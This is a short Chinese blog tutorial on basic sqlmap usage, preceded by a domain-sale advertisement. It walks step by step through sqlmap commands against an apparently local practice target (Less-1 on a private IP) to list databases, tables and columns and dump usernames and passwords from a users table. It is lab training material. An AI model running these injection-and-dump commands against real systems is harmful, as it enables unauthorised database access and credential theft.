本网站(662p.com)打包出售,且带程序代码数据,662p.com域名,程序内核采用TP框架开发,需要联系扣扣:2360248666 /wx:lianweikj
精品域名一口价出售:1y1m.com(350元) ,6b7b.com(400元) , 5k5j.com(380元) , yayj.com(1800元), jiongzhun.com(1000元) , niuzen.com(2800元) , zennei.com(5000元)
需要联系扣扣:2360248666 /wx:lianweikj
sqlmap基本使用操作
chenguangming9 · 325浏览 · 发布于2020-05-29 +关注

sqlmap 使用

需要安装python2的环境

使用方法:

用最基础的get型注入开始

1、当我们发现注入点的时候,

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1"

2、查看所有的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dbs

3、查看当前使用的数据库

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --current-db

4、发现使用的是security数据库,接下来对此数据库进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --tables -D "security"

5、查出所有表以后,对users表的列名进行查询

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --columns -T "users" -D "security"

6、users表中的列名已经知道了,可以直接查出所有数据

python sqlmap.py -u "http://192.168.100.200:8004/Less-1/index.php?id=1" --dump -C "id,username,password" -T "users" -D "security"



在“用户”-》“.sqlmap”-》“output”可看到查询结果

相关推荐

Protobuf协议应用干货

奔跑的男人 · 1068浏览 · 2019-06-03 11:03:30
谈谈Java任务的并行处理

吴振华 · 1015浏览 · 2019-06-03 11:11:27
Dubbo Adaptive机制详解

吴振华 · 951浏览 · 2019-06-06 11:12:41
Dubbo配置属性初始化详解

· 824浏览 · 2019-06-11 11:34:07
RPC的负载均衡策略

qq2360248666 · 760浏览 · 2019-06-12 14:27:20
加载中

0评论

评论
分类专栏
小鸟云服务器
扫码进入手机网页